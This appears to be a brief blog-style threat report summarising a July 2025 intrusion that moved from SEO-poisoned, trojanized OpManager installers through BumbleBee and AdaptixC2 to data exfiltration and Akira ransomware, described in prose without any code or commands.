In July 2025, a sophisticated cyber attack utilized SEO poisoning to deliver the BumbleBee loader through trojanized ManageEngine OpManager installers. Upon execution via DLL side-loading, the malware established communication with its command-and-control (C2) infrastructure and deployed an AdaptixC2 beacon. This allowed the threat actor to perform extensive network reconnaissance, map internal systems, and establish persistence using new domain admin accounts and remote access tools like RustDesk and Cloudflared.
The intrusion progressed into significant credential harvesting, where actors dumped the NTDS.dit Active Directory database and extracted Veeam backup credentials. Lateral movement was facilitated through RDP and reverse SSH tunneling to bypass firewall restrictions. Over 75GB of sensitive data, including file shares and SYSVOL configurations, was exfiltrated via FileZilla to an external server in Ukraine. The operation culminated in the deployment of Akira ransomware, which utilized WMI to delete Volume Shadow Copies and encrypt both root and child domains.
Top comments (0)